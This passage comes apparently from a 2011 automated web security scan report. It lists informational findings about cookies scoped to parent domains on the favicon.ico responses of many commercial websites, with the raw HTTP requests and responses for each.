13.35. http://www.eharmony.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eharmony.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:19 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 03 Mar 2009 02:00:31 GMT
ETag: "47e-4642d4cc30dc0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 13:37:19 GMT
Vary: Accept-Encoding
Content-Type: image/x-icon
Set-Cookie: BIGipServerFront=3910078892.16671.0000; path=/
Set-Cookie: lbid=acad40db-aaea-469e-7b2c-2ecabfc46d1a;expires=Thu, 29-Sep-2011 13:37:19 GMT;path=/;domain=.eharmony.com;

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
13.36. http://www.emedtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.emedtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595155213; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
ETag: W/"1150-1196102204000"
Last-Modified: Mon, 26 Nov 2007 18:36:44 GMT
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

............ .h.......(....... ..... ..........................|m..|m..{k..wf..xk...y...........x..ym..vf..wf..zj..|m..|m..|m..|m..zk..vg......................................yl..wf..{k..|m..{l..vf...
...[SNIP]...
13.37. http://www.epinions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...... ..............(... ...@...................................@............ ..@ ... ... ...@..@@...@...@...`..@`...`...`......@...............@...............@...............@............. .@. ...
...[SNIP]...
13.38. http://www.fedex.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fedex.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:32 GMT
Content-length: 3638
Content-type: image/x-icon
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750672092920271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Thu, 14 Feb 2008 18:25:33 GMT
Etag: "e36-47b4879d"

..............h...&... ..............(....... ...........@............................cu...g.....fff......<S..............p...I^......oz...............................................................
...[SNIP]...
13.39. http://www.fool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fool.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fool.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Sat, 15 Jul 2006 14:05:56 GMT
Accept-Ranges: bytes
ETag: "07a65ca17a8c61:0"
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Sun, 03-Apr-2011 13:35:38 GMT; path=/
Set-Cookie: Tookie=T=04877517183428375666730643888134; domain=.fool.com; expires=Tue, 30-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=8D3DBA4B712DAFA2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Sat, 02 Apr 2011 13:35:38 GMT
Content-Length: 4710

..............(...F...........h...n... .............. ...........    ..(....... ..........................................................................................................    ..............
...[SNIP]...
13.40. http://www.funbrain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.funbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:15 GMT
ETag: "436-3ba36634b1fc0"
Expires: Sat, 02 Apr 2011 13:27:15 GMT
Last-Modified: Tue, 01 Apr 2003 03:28:07 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750835307007; path=/; expires=Sun, 01-Apr-12 13:27:15 GMT; domain=.funbrain.com
Content-Length: 1078
Connection: keep-alive

..............(...&... ..........N...(....... .........................................................................................................................................................
...[SNIP]...
13.41. http://www.gamehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamehouse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:37 GMT
Server: Apache/2.2.11 (CentOS)
Last-Modified: Tue, 11 Nov 2008 01:40:48 GMT
ETag: "58b82a5-436-45b5ff805e800"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Sun, 03-Apr-2011 15:07:42 GMT;path=/;domain=gamehouse.com

...... ..........&...........(.......(... ...@.........................................................................................................................................................
...[SNIP]...
13.42. http://www.guardian.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guardian.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:58 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFRncjZER01BQUJrWkhJMEFBQUhPfDY5VkZuRGVpTVd3ZzBJT0pFbVBrZ0E9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:58 GMT
Last-Modified: Fri, 04 Apr 2008 16:07:11 GMT
Accept-Ranges: bytes
Content-Length: 895
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:31:58 GMT
X-GU-httpd: 06
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

..............h.......(....... ...............................L...w.........L.L.L.L.L.............L.L.L..d"...........f.|D.|D.|D..U............L.L.L.L..X..................................
...[SNIP]...
13.43. http://www.hayneedle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hayneedle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 No Content
Date: Sat, 02 Apr 2011 14:13:19 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFID=1845783;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFTOKEN=18555418;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SID=168F9556%2DAFAA%2DD69D%2DBF662349017993E3;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168F9564%2DBCFC%2D2008%2DF545EEB98C2F515F;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168F9572%2DFF8F%2D4773%2D011E87EA6323CAED;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: GEO_DATA=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27POSTAL%5FCODE%27%3E%3Cstring%3E05672%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;path=/
Set-Cookie: SURVEYS=309%7C%7Bts%20%272011%2D04%2D02%2009%3A13%3A19%27%7D%7C0%7C0;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SESSION_COUNTER=4310204;path=/
Set-Cookie: SIGNATURE=MWP5GCRJ3nTSpdoEL7gF10r6POmFuHsBTEquPge%2BNls2sE5V2f2bPn6ywNvybK6A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: INITIAL_SESSION_LOGGED=1;domain=.hayneedle.com;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 22867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
13.44. http://www.hiexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hiexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "e6ba-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com
Set-Cookie: TLTUID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.hiexpress.com;path=/

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
13.45. http://www.holidayinn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holidayinn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "3c877-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.holidayinn.com;path=/

............ .h.......(....... ..... .............................................................................................-.5.5.<.C.M.F.Y.B.N.5.L..r..*p..<.N.A.B.B.@.D.A.../.<.3...........    ...
...[SNIP]...
13.46. http://www.hsn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:1018"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Set-Cookie: TLTHID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Content-Length: 894

..............h.......(....... ................................................r..:........8..s..........................q...~..}..|..}..}..~...
..t.................^.~..|..~..}..}..}..|..|..|.....\
...[SNIP]...
13.47. http://www.ichotelsgroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ichotelsgroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "4158-57e-4824e228"
Accept-Ranges: bytes
Content-Length: 1406
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

..............h.......(....... ........................................................................ @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...
...[SNIP]...
13.48. http://www.imageshack.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imageshack.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Thu, 06 Aug 2009 00:27:03 GMT
Connection: close
Set-Cookie: is_uuid=8c73deec231e4ae196986744389ee358; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

............ .h.......(....... ..... ...................................................................".&1g..$...$...$...$........................................".&1g..$...$...$...$...$............
...[SNIP]...
13.49. http://www.know-where.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.know-where.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.know-where.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751948535439; path=/; domain=.Know-Where.com
Last-Modified: Mon, 26 Jan 2009 06:20:00 GMT
ETag: "16668e-e36-4615cba75a400"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:48 GMT
Content-Type: image/x-icon

..............h...&... ..............(....... ...........@...........................EK...u:...................v.hh...!.........../...b....Q.OO......27..y{..fk.......................................
...[SNIP]...
13.50. http://www.life123.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.life123.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:46 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: wz_cu=0; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: accepting=1; Domain=.life123.com; Expires=Sun, 01-Apr-2012 13:52:47 GMT; Path=/
Set-Cookie: user=l=dir; Domain=.life123.com; Path=/
Content-Length: 58228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Articles and Answers ab
...[SNIP]...
13.51. http://www.lingospot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lingospot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=979b847691af299f; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Set-Cookie: LUI=8ac36f99936b606b; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:04:58 GMT
Server: lighttpd/1.4.15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
13.52. http://www.marykay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marykay.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2011 17:27:26 GMT
Accept-Ranges: bytes
ETag: "ef81c06c48dfcb1:b205e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
Set-Cookie: TLTSID=C7AF0F99472C520E98E3ADAFDE4C36B7; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS102
Date: Sat, 02 Apr 2011 14:18:35 GMT
Set-Cookie: www.marykay.com=537599148.20480.0000; expires=Sat, 09-Apr-2011 14:18:36 GMT; path=/

..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt.
...[SNIP]...
13.53. http://www.mbnanetaccess.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mbnanetaccess.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mbnanetaccess.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:57 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com
Set-Cookie: TLTUID=9C67422A5D32105D233AFD595FFC398E; Path=/; Domain=.mbnanetaccess.com; Expires=Sat, 02-04-2021 14:07:57 GMT
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...
13.54. http://www.metropcs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metropcs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metropcs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: private
Content-Length: 29926
Content-Type: image/x-icon
Last-Modified: Wed, 30 Mar 2011 21:30:20 GMT
Accept-Ranges: bytes
ETag: "03e79ab21efcb1:0"
Set-Cookie: ObSSOCookie=auuIpgwyx1%2Bmw4aWg2EyflKn5s%2FrKmP9MXMdNQ7lQcFvhHjxf5%2FOq9vE6NP86tAKPXTepiWIEt%2BfE34ONiEac50naqF19H1jsmkcWUiKlGXMsTCflpbklJ9i9RiI0HJDY4%2BFRZ4FmP24MBvhkg2khWY0z9uRmu2l1mON8jQVqkKc3QXP4K9Ghp2bxsaZdMtnnSrj320WNcvwiKmeosLZmxL4yCOaO2p5PCsrggtrE5R%2FDssgDWmAam4%2Fgl48APqZdS9deMuxWaBos%2BcumL3pEP7Q1psil5WGDbY1RUNT14sdtUkRmiAQutC8BBzwW1bS5dXeD4NwSQqgU1SEIiRm5g%3D%3D; httponly; path=/; domain=.metropcs.com;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:32 GMT

......00......h....... ...........................
..........(.......00..........&.. ..........................v$..........h...>+..00.... ..%...0.. .... .....NV........ ..    ...f........ .h...~p..(.
...[SNIP]...
13.55. http://www.motortrend.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motortrend.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motortrend.com
